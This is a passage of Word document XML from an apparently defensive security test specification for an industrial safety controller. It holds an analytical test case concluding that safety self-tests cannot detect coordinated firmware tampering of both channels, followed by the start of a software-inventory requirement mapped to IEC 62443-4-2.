          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3377062A" w14:textId="434CC5ED" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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architectural analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABE09E0" w14:textId="29BE4649" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="134ACC55" w14:textId="0F584D9C" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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analytically, why the dual-channel cross-check and the processor self-test library cannot detect a coherent malicious modification applied identically to both channels, a systematic change </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>on which both channels still agree,  and therefore provide no security authenticity. Cross-references the em</w:t>
            </w:r>
            <w:r w:rsidR="00FD2185" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>pi</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>rical proof in TC-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>005-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A137DE8"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fault model of the safety self-tests (random, independent hardware faults; channel divergence).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08D22073" w14:textId="77777777" w:rsidR="00AF17E1"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Describe the attack model (coherent, identical modification of both channels).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A70789C" w14:textId="0033963A" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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Argue that the two are disjoint; conclude that only a signed-image/secure-boot mechanism would detect the latter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76795614" w14:textId="4B89CCBC" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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Analytical finding. Substantiates that integrity-of-execution (safety) does not provide authenticity (security); no lab exploit required beyond TC-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>005-</w:t>
            </w:r>
            <w:r w:rsidR="0022010B" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>03</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="135CF86A" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70B2A9B6" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11259598" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE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6D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C5085D6" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99"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83DE4" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00E83DE4" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D90D46C" w14:textId="0ADA6981" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE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TC-RQ005-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000130E2" w:rsidRPr="006D5B99"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0130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E9E0E8C" w14:textId="207E3A49"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 review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000130E2" w:rsidRPr="006D5B99"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0130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A274734" w14:textId="6F19A71C" w:rsidR="000130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="285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None </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000130E2" w:rsidRPr="006D5B99"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0130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56623535" w14:textId="07063041"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List the fault model of the self-tests (STL, 1oo2 cross-check)</w:t>
            </w:r>
            <w:r w:rsidR="00B70D81" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A01503" w14:textId="62D7A88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 independent hardware faults.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6852D700"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Contrast this with the attack model (identical, coordinated</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0EFCB5"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manipulation of both channels, actually performed in TC-RQ005-03).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53018032"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Conclude that only a signed image / secure boot mechanism would be able</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B9FF333" w14:textId="77777777" w:rsidR="000130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E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detect a coherent manipulation of this kind.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CD39D1" w14:textId="4241E117" w:rsidR="000130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E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color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># 4. Document the conclusion, referencing the empirical result of TC-RQ005-03.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000130E2" w:rsidRPr="006D5B99"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1B21EF3" w:rsidR="000130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B91A257" w14:textId="19D70946" w:rsidR="000130E2" w:rsidRPr="006D5B99" w:rsidRDefault="000130E2" w:rsidP="000130E2">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color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Analytical finding </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> confirms that safety self-tests provide no security authenticity (see the empirical evidence from TC-RQ005-03).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4B26DC45" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="00E83DE4">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035959B8" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDBB954" w14:textId="77777777" w:rsidR="00E83DE4" w:rsidRPr="006D5B99" w:rsidRDefault="00E83DE4" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D59504C" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD03C6C" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6D68BF" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA30D0F" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF58CFF" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CAD845" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CE5C9B" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EA8814" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6111C2F5" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3D89A9" w14:textId="77777777" w:rsidR="00F8765E" w:rsidRPr="006D5B99" w:rsidRDefault="00F8765E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C31906" w14:textId="77777777" w:rsidR="00BE4E24" w:rsidRPr="006D5B99" w:rsidRDefault="00BE4E24" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B465CE4" w14:textId="77777777" w:rsidR="00436657" w:rsidRPr="006D5B99" w:rsidRDefault="00436657" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C028BFC" w14:textId="77777777" w:rsidR="007F06C9" w:rsidRPr="006D5B99" w:rsidRDefault="007F06C9" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3242ABE2" w14:textId="77777777" w:rsidR="00254A92" w:rsidRPr="006D5B99" w:rsidRDefault="00254A92" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2794A151" w14:textId="11E8FD1B" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="double"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REQUIREMENT 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD6896" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 1: Critical Review &amp; Theoretical Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE36057" w14:textId="3D7D7740" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MVO-ID: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ-006</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3B117" w14:textId="7010E39C" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="0024048B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVO Requirement Text:</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The system shall identify the software installed on it that is necessary for safe operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDD7DC5" w14:textId="5CE45920" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IEC 62443-4-2 CR</w:t>
      </w:r>
      <w:r w:rsidR="00160BC6"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4048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C76F5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BD72A9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 4.1,</w:t>
      </w:r>
      <w:r w:rsidR="006C76F5" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00BD72A9" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CR 7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2ED42C" w14:textId="11CBF4DF" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (host FW, SCPU FW, bootloaders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E5B26" w14:textId="548B60E8" w:rsidR="0024048B" w:rsidRPr="006D5B99" w:rsidRDefault="00196EB6" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00710057" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tampering, </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE0C55"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Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511583E4" w14:textId="6F38CB16"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Software inventory (IoT-Core): /deviceinfo/swrevision, /swinfo/cpubootloaderversion, /swinfo/scpuversion, /swinfo/scpubootloaderversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171A795" w14:textId="203470D0" w:rsidR="00DD2D6F" w:rsidRPr="006D5B99" w:rsidRDefault="00DD2D6F" w:rsidP="00AC18F9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 SOFTWARE_REVISION / I&amp;M5 annotation</w:t>
      </w:r>
